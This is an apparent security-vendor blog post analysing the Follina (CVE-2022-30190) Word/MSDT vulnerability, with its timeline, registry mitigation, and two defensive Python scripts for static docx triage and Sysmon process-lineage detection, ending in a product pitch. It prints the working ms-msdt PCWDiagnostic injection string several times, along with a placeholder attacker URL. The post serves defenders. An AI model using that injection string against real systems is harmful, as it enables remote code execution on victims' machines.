Follina (CVE-2022-30190): The Microsoft Zero-Day That Bypassed Macro Protections

A Word document, no macros enabled, and full remote code execution. Follina exploited the Microsoft Support Diagnostic Tool through the ms-msdt protocol handler, rendering years of macro-blocking defenses irrelevant.

Nayan Dey
Security Researcher

For years, the security industry told users the same thing: disable macros, and you are mostly safe from malicious Office documents. Follina made that advice obsolete overnight.

Discovered being actively exploited in the wild in late May 2022, CVE-2022-30190, quickly dubbed "Follina" because the malicious sample's filename contained 0438, the area code of the Italian town of Follina, allowed attackers to achieve remote code execution through a Word document without a single macro being enabled. The exploit leveraged a protocol handler most defenders had never even considered: ms-msdt.

How Follina Works

The attack chain is deceptively simple. A Word document contains a linked OLE object whose relationship target is not an embedded part but an attacker-controlled URL. When the document is opened (or, in the RTF variant, merely previewed in Explorer), Word fetches that remote HTML file. The HTML contains a script that redirects to an ms-msdt: URI with crafted arguments, for example:

ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? /../../$(Start-Process('calc'))../../$(.444444 )"

The Microsoft Support Diagnostic Tool (MSDT) hands the IT_RebrowseForFile value to the PowerShell-based PCWDiagnostic troubleshooting pack, where the $( ) subexpression is evaluated and the embedded command runs with the privileges of the calling user. No macro warning. No Protected View interception in the RTF and preview-pane scenarios. No click required beyond opening, or merely previewing, the document.

What made Follina particularly dangerous was the attack surface it exposed. MSDT is a signed, trusted Microsoft binary. Protocol handlers are dispatched by the operating system, outside Office's own document controls such as Protected View. The combination created a direct path from document opening to arbitrary code execution that existing security controls were not designed to catch.
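The delivery mechanism described above leaves a static indicator in the document itself: an oleObject relationship whose Target is an external URL rather than an embedded part. The Python script below, added here as an example and not code from the original article, scans a .docx for that indicator and checks a fetched HTML body for the ms-msdt: scheme. The two sample documents and the HTML snippet are constructed inline so it runs offline, and the attacker.example URL is a placeholder. It handles the OOXML (.docx) container only, not the RTF variant.

```python
"""Static triage for Follina-style delivery documents (added example).

A Follina .docx carries a linked OLE object whose relationship in
word/_rels/document.xml.rels has TargetMode="External" and points at an
attacker-controlled URL instead of an embedded part under word/embeddings/.
The constant URIs below are the standard OOXML relationship identifiers.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL_TYPE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                "relationships/oleObject")
# The fetched HTML invokes the handler through a URI beginning with this scheme.
MSDT_URI = re.compile(r"ms-msdt:", re.IGNORECASE)


def find_external_ole_links(docx_bytes: bytes) -> list[str]:
    """Return the Target of every oleObject relationship marked External."""
    hits: list[str] = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):  # e.g. word/_rels/document.xml.rels
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                if (rel.get("Type") == OLE_REL_TYPE
                        and rel.get("TargetMode") == "External"):
                    hits.append(rel.get("Target", ""))
    return hits


def html_invokes_msdt(html: str) -> bool:
    """True if a fetched HTML body references the ms-msdt: protocol handler."""
    return MSDT_URI.search(html) is not None


def triage(docx_bytes: bytes) -> str:
    """Summarise a document as 'clean' or 'suspicious: <urls>'."""
    links = find_external_ole_links(docx_bytes)
    return "clean" if not links else "suspicious: " + ", ".join(links)


# --- constructed samples (not real malware) ---------------------------------
def build_docx(rels_xml: str) -> bytes:
    """Build a minimal .docx-shaped zip with just the parts the scanner reads."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<document/>")
        zf.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


# Ordinary embedded OLE object: the target is a part inside the package.
BENIGN_RELS = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{RELS_NS}">
  <Relationship Id="rId1" Type="{OLE_REL_TYPE}" Target="embeddings/oleObject1.bin"/>
</Relationships>"""

# Follina shape: the OLE target is an external URL Word will fetch (placeholder host).
FOLLINA_RELS = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{RELS_NS}">
  <Relationship Id="rId1" Type="{OLE_REL_TYPE}"
      Target="http://attacker.example/payload.html!" TargetMode="External"/>
</Relationships>"""

# Shape of the second stage: a script that redirects to the handler URI.
SAMPLE_HTML = ('<html><script>window.location.href = '
               '"ms-msdt:/id PCWDiagnostic /skip force /param ...";</script></html>')

if __name__ == "__main__":
    print("benign :", triage(build_docx(BENIGN_RELS)))
    print("follina:", triage(build_docx(FOLLINA_RELS)))
    print("html   :", html_invokes_msdt(SAMPLE_HTML))
```

The scanner reports only the URL, which is exactly why static analysis of the document alone told defenders so little: the payload lives on the remote server, so the external oleObject relationship is the strongest indicator the file itself offers.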

The Exploitation Timeline

The vulnerability had been quietly exploited before its public disclosure. Researchers later identified campaigns targeting organizations in Tibet, Russia, and Western Europe. The timeline reveals how long defenders were exposed:

  • April 12, 2022: First known malicious sample uploaded to VirusTotal from a Belarusian IP address; the technique was reported to Microsoft, which initially closed the report as not a security issue
  • May 27, 2022: Researchers at nao_sec flagged a malicious document uploaded to VirusTotal from Belarus; Kevin Beaumont (GossiTheDog) publicly analyzed it and gave the bug its name
  • May 30, 2022: Microsoft acknowledged the vulnerability and assigned CVE-2022-30190
  • June 14, 2022: Microsoft released an official patch in the June 2022 Patch Tuesday update

For roughly two months, attackers had a working zero-day against every supported version of Windows. During the gap between public disclosure and patch availability, Microsoft's primary mitigation guidance was to disable the MSDT URL protocol handler by deleting its registry key from an elevated command prompt, after exporting the key to a file of your choosing so it could be restored later:

reg export HKEY_CLASSES_ROOT\ms-msdt ms-msdt-backup.reg
reg delete HKEY_CLASSES_ROOT\ms-msdt /f

This was a blunt instrument. It disabled every legitimate use of ms-msdt: links until the key was restored with reg import, and many organizations were hesitant to deploy registry changes at scale without thorough testing.

Why Traditional Defenses Failed

Follina was effective precisely because it operated in the gaps between existing defenses:

Macro-blocking was irrelevant. The exploit used OLE object references and protocol handlers. No VBA. No macro prompt. Organizations that had spent years implementing macro-blocking policies gained zero protection.

Protected View was inconsistent. When a document was downloaded from the internet and opened in Word, Protected View should have prevented the external reference from loading. But this protection did not apply in all scenarios. Preview in Windows Explorer, opening via Rich Text Format (.rtf) files, or certain document handling paths bypassed Protected View entirely.

Antivirus detection was initially weak. The payload was executed through a legitimate Windows binary (MSDT). Many endpoint detection tools were not monitoring ms-msdt protocol invocations. The actual malicious content was fetched from a remote server, so static analysis of the document itself revealed only a URL.

Email gateways passed the documents through. Without macros to flag, many email security products treated the documents as low-risk. The malicious payload was not embedded in the document — it was fetched at runtime from an external server.

Attack Variants and Weaponization

Once the vulnerability became public, weaponization was rapid. Within days, multiple threat actors incorporated Follina into their toolkits:

TA413, a China-linked threat group, used Follina-laden documents targeting the Tibetan community. The lures impersonated the Central Tibetan Administration, the government-in-exile, and were delivered as Word documents inside zip archives.

A separate campaign, suspected to be state-aligned but not publicly attributed, targeted European government entities and US local governments. The phishing lures referenced salary adjustments and official communications.

Commodity malware distributors adopted Follina for distributing QBot, AsyncRAT, and other payloads. The barrier to exploitation was extremely low: proof-of-concept code was available on GitHub within days of public disclosure.

The RTF variant was especially concerning. An RTF file with the Follina exploit could trigger code execution simply by being previewed in the Windows Explorer preview pane. No double-click required. Just selecting the file in a directory listing was enough.

The Protocol Handler Problem

Follina exposed a systemic issue in Windows security architecture. Protocol handlers — URI schemes like ms-msdt:, ms-excel:, ms-word:, and dozens of others — create pathways between applications that bypass many security boundaries.

Each protocol handler is a potential attack surface. When a handler invokes a complex application like MSDT with attacker-controlled arguments, the result is equivalent to command injection. The Windows ecosystem has accumulated hundreds of registered protocol handlers over decades of backward compatibility, and auditing all of them for security implications is a massive undertaking.

Microsoft's response to Follina extended beyond patching the specific vulnerability. The August 2022 update fixed a second MSDT flaw (CVE-2022-34713, "DogWalk"), and subsequent updates reviewed and restricted protocol handler behavior more broadly, but the fundamental architecture remains.

Detection and Response Strategies

Organizations that detected Follina exploitation early shared common characteristics in their detection capabilities:

Process lineage monitoring was the most reliable detection method. Alerts on msdt.exe being spawned as a child process of winword.exe, excel.exe, or outlook.exe caught the exploitation chain. The key was monitoring process parent-child relationships, not just individual process execution.

Parent Process: WINWORD.EXE
Child Process: msdt.exe
Command Line: contains "PCWDiagnostic" and "IT_RebrowseForFile"

Network monitoring for Office applications making outbound HTTP requests to fetch HTML content also proved effective. Word documents should rarely need to fetch content from arbitrary external URLs during normal operation.

Sysmon logging with appropriate configuration captured the full exploitation chain. Events of interest included process creation (Event ID 1), network connections from Office processes (Event ID 3), and DNS queries from unexpected processes (Event ID 22).
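The process-lineage rule above, run over sample telemetry. This Python script is an added example, not code from the original article; it models Sysmon Event ID 1 and Event ID 3 records as dicts keyed by the Sysmon EventData field names (Image, ParentImage, CommandLine, DestinationPort, Initiated), and every event below is constructed for the demonstration, with the process paths and the 203.0.113.10 address as placeholders. It generalizes the rule slightly: msdt.exe spawned by any Office process is flagged, with higher severity when the PCWDiagnostic parameter names appear on the command line, and an ms-msdt: URI carrying those parameters is flagged even from a non-Office parent, to cover delivery paths that do not run through WINWORD.EXE.

```python
"""Process-lineage detection for the Follina chain (added example).

Events mimic Sysmon EventData fields: Event ID 1 (process creation) with
Image / ParentImage / CommandLine, and Event ID 3 (network connection) with
Image / DestinationPort / Initiated. All events below are constructed samples.
"""
import ntpath
from typing import Optional

OFFICE_IMAGES = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
# Parameter names from the PCWDiagnostic troubleshooting pack abused by Follina.
FOLLINA_PARAMS = ("pcwdiagnostic", "it_rebrowseforfile", "it_browseforfile")


def _image_name(path: str) -> str:
    """Lower-cased file name of a Windows path ('C:\\...\\MSDT.EXE' -> 'msdt.exe')."""
    return ntpath.basename(path).lower()


def classify(event: dict) -> Optional[dict]:
    """Return an alert dict for a suspicious event, or None."""
    eid = event.get("EventID")
    image = _image_name(event.get("Image", ""))

    if eid == 1 and image == "msdt.exe":
        parent = _image_name(event.get("ParentImage", ""))
        cmd = event.get("CommandLine", "").lower()
        params = [p for p in FOLLINA_PARAMS if p in cmd]
        via_uri = "ms-msdt:" in cmd
        if parent in OFFICE_IMAGES:
            # Office has no business launching the diagnostic tool at all.
            return {"severity": "high" if params else "medium",
                    "rule": "msdt.exe spawned by Office process",
                    "parent": parent, "indicators": params}
        if via_uri and params:
            # Same malicious URI, different launcher (viewer, browser, shell).
            return {"severity": "medium",
                    "rule": "ms-msdt: URI with PCWDiagnostic parameters",
                    "parent": parent, "indicators": params}
        return None

    # Office process opening an outbound HTTP(S) connection: low-severity
    # context that corroborates the external-OLE fetch.
    if (eid == 3 and image in OFFICE_IMAGES and event.get("Initiated") == "true"
            and event.get("DestinationPort") in (80, 443)):
        return {"severity": "low", "rule": "Office process outbound HTTP(S)",
                "parent": None, "indicators": [str(event.get("DestinationIp"))]}
    return None


def detect(events: list) -> list:
    """Run classify() over a batch and keep only the alerts."""
    return [alert for alert in (classify(e) for e in events) if alert]


# --- constructed sample telemetry --------------------------------------------
OFFICE = r"C:\Program Files\Microsoft Office\root\Office16"
SAMPLE_EVENTS = [
    # 1) user ran a troubleshooter from Explorer: benign, no alert
    {"EventID": 1, "Image": r"C:\Windows\System32\msdt.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"C:\Windows\System32\msdt.exe /id NetworkDiagnosticsWeb"},
    # 2) Word fetched the remote HTML: Word -> outbound HTTP (low)
    {"EventID": 3, "Image": OFFICE + r"\WINWORD.EXE", "Initiated": "true",
     "DestinationIp": "203.0.113.10", "DestinationPort": 80},
    # 3) the Follina chain itself: Word -> msdt.exe with the PCWDiagnostic URI (high)
    {"EventID": 1, "Image": r"C:\WINDOWS\system32\msdt.exe",
     "ParentImage": OFFICE + r"\WINWORD.EXE",
     "CommandLine": r'"C:\WINDOWS\system32\msdt.exe" ms-msdt:/id PCWDiagnostic '
                    r'/skip force /param "IT_RebrowseForFile=? /../../$(Start-Process calc)../../"'},
    # 4) Outlook launching msdt without the parameter names: still worth a look (medium)
    {"EventID": 1, "Image": r"C:\Windows\System32\msdt.exe",
     "ParentImage": OFFICE + r"\OUTLOOK.EXE",
     "CommandLine": r"C:\Windows\System32\msdt.exe /id AudioPlaybackDiagnostic"},
    # 5) the same URI arriving from a non-Office parent (medium)
    {"EventID": 1, "Image": r"C:\Windows\System32\msdt.exe",
     "ParentImage": r"C:\Program Files\SomeViewer\viewer.exe",
     "CommandLine": r'"C:\Windows\System32\msdt.exe" ms-msdt:/id PCWDiagnostic '
                    r'/skip force /param "IT_BrowseForFile=$(calc)"'},
    # 6) Word spawning the print helper: benign
    {"EventID": 1, "Image": r"C:\Windows\splwow64.exe",
     "ParentImage": OFFICE + r"\WINWORD.EXE",
     "CommandLine": r"C:\Windows\splwow64.exe 12288"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert["severity"].upper(), "-", alert["rule"], alert["indicators"])
```

The parent-child check is what separates event 3 from event 1: both are msdt.exe with a diagnostic pack ID, and only the lineage tells you one was launched by a document.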

Lessons for Supply Chain Security

Follina carries important lessons that extend well beyond the specific vulnerability:

Trusted binaries are attack vectors. MSDT is a signed Microsoft binary. Attackers increasingly target legitimate tools and processes — a technique collectively known as living-off-the-land. Supply chain security must account for the fact that trusted software can be weaponized.

Defense-in-depth assumptions can be wrong. Many organizations believed their layered defenses (email gateway + macro blocking + endpoint protection) adequately addressed document-based attacks. Follina revealed that all three layers could be bypassed simultaneously by a single technique.

Legacy features create lasting risk. The ms-msdt protocol handler existed so that help and support links could launch troubleshooting packs directly, a convenience few administrators knew was registered. In software supply chains, legacy components, deprecated APIs, and backward-compatible features accumulate as hidden attack surface. Inventorying and managing this surface is essential.

Patching is not instant. Roughly two and a half weeks elapsed between public disclosure and the official patch, and the earliest known sample predated the patch by two months. Organizations need detection and mitigation capabilities that operate independently of vendor patches. Relying solely on patching means accepting whatever window of exposure the vendor's release cycle imposes.

How Safeguard.sh Helps

Follina demonstrated that understanding your software components — including the protocol handlers, legacy features, and trusted binaries in your environment — is a prerequisite for effective defense. Safeguard.sh provides deep software inventory capabilities that go beyond simple dependency lists.

With Safeguard.sh, organizations can maintain comprehensive SBOMs that track not just third-party libraries but the full software surface area deployed across their environments. When vulnerabilities like Follina emerge, having an accurate inventory means you can immediately identify which systems are exposed, which mitigation steps apply, and which detection rules need deployment. Safeguard.sh's continuous monitoring flags newly disclosed vulnerabilities against your existing inventory, compressing the time between disclosure and informed response from days to minutes.

Rather than scrambling to determine exposure after each zero-day disclosure, Safeguard.sh customers know their attack surface before the exploit lands.
